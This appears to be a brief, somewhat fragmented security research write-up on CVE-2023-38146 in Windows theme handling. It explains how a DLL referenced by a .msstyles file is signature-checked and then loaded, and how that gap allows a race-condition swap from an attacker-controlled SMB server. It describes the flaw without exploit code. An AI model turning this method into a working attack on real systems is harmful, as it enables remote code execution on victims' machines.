CVE-2023-38146 is an Arbitrary Code Execution via Windows Themes which is a file format responsible for customization of the OS appearance.
.theme file is just a file containing configuration for the customization of the OS appearance.
this vulnerability only started with
Windows 11 specifically in
uxtheme.dll, So we can get a vulnerable version of the DLL from
C:\Windows\WinSxS where an old version of Dll can be found there after the update.
the update was on
12-9-2023 so we need to grab one before that date.
placing the component needs in the same place to make our vulnerable DLL come first in the search order and now our vulnerable DLL gets used.
Double-clicking in the
.theme file will result in executing the following command.
"C:\WINDOWS\system32\rundll32.exe" C:\WINDOWS\system32\themecpl.dll,OpenThemeAction <theme file path>
firing up ida in a vulnerable system and looking around the code, found that there is an extension other than
.theme handled there.
looking inside the “.theme” file there is a reference to
.msstyles file format but actually, it’s a
this Dll gets loaded as data in the address space of the process then a resource inside it gets checked.
if the version in the resource is equal to “999”
ReviseVersionIfNecessary gets called which is the vulnerable function.
let us check what is happening inside.
_vrf.dllto the end of the msstyles file.
- opens it
- check its signature
- close the file
- load the DLL
you may have noticed what could go wrong here, there is an obvious race condition after the time of signature verification because if the place where the DLL resides is an attacker-controlled “SMB Server” the DLL can be replaced between the time of the check and the time of load.